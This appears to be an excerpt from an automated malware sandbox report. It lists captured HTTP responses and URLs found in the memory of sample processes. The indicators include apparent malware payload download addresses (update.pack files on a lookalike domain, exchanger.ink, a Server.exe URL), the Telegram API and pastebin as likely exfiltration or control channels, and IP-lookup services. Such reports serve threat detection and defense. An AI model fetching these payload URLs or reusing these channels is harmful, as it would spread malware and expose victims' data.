                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:23 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: b02ec5d1db054e08a299c1bb129ccbecConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:24 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 3fe90cbb8d934200afd5692c2a9f517eConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:25 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 5ac34c91208a4ed68d1539c76461bd4dConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:26 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 19257cddd1964a18937af02c4451b113Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:27 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: e45280295d66465c8ce5cde1d8f2f655Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:29 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 7844d9b610e94b3e9958b7e12e5481b1Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:30 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 9367e727cb7140928822be84efec2857Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:31 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: fc26f50bdac0430aa2363f38f94c5dfbConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:32 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: e980e04bf9cd4687969381d14d820f3bConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:28 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 4940563c263a4ed3b37c3a86e8dbeffcConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:28 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: e52878a685204f45bccfbb878255493bConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Jul 2024 11:28:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 50755Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J23WTYW1WES339EJ18E99HNPCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDDK09sas0hEkzBID3%2BV004n7lwwGklSht2LAABLcpqI30Ljl5Xa4KTbAnhKSReO9QOw7cF96foreNRVbTWde7QfcCUmLDeDvDnByblnH8hswsz2snMBnM4Gnyko"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ef406588498cc0-EWRalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:29 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 48d04f92f1ac43199464af56a5d91cbcConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:30 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 46ad6b05262e4619b51ae914000086daConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:31 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 4069f037958a44debf9ed35c1cac595eConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:31 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: f43c932cfa484fca9fc7ff80a7acadfaConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:32 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 1e8c8e9e1b2e44389c706f2a5c52b53cConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:34 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 67908c3c3d004af39cf20834f79e4f2bConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:35 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: cd1660047af542a6a6de914b17b29109Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:37 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: b9ae42e604aa4066aa9d8799a78b39adConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:38 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 963840405bcb441eb4550f06d4fd0515Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:40 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: d3386346e32345819c3a4031911030dcConnection: close
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000034B6000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A48000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A48000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                      Source: relog.exe, relog.exe, 00000037.00000002.2852161070.0000023277640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update.pack
                      Source: xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update.packP
                      Source: xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.drString found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update.packhttp://auth.xn--conbase-sfb.xyz/api/update2.packhttp:
                      Source: Service_{B955B2CC07A01546086603}.exe, 00000034.00000002.2744093338.000002A542926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update.packll
                      Source: relog.exe, relog.exe, 00000037.00000002.2852161070.0000023277640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update2.pack
                      Source: xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update2.packdll
                      Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: svchost.exe, 00000003.00000002.3145605822.000002147840F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: svchost.exe, 00000018.00000002.3190686238.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: svchost.exe, 00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: svchost.exe, 00000003.00000003.1807789448.0000021478318000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 00000003.00000003.1807789448.0000021478318000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 00000003.00000003.1807789448.0000021478318000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 00000003.00000003.1807789448.000002147834D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: relog.exe, relog.exe, 00000037.00000002.2852161070.0000023277648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://exchanger.ink/api/update.pack
                      Source: relog.exeString found in binary or memory: http://exchanger.ink/api/update2.pack
                      Source: relog.exe, 00000035.00000002.2752497355.0000028619D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://exchanger.ink/api/update2.pack.
                      Source: relog.exe, 00000037.00000002.2852161070.0000023277648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://exchanger.ink/api/update2.pack6
                      Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://hrdc.pk/Server.exe
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3152328073.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.drString found in binary or memory: http://ip-api.com/xml
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/xmld
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.comd
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2293823850.000000000107E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.ao
                      Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2293823850.000000000107E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
                      Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                      Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                      Source: explorer.exe, 00000002.00000002.3166491979.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1786313530.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1785818560.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
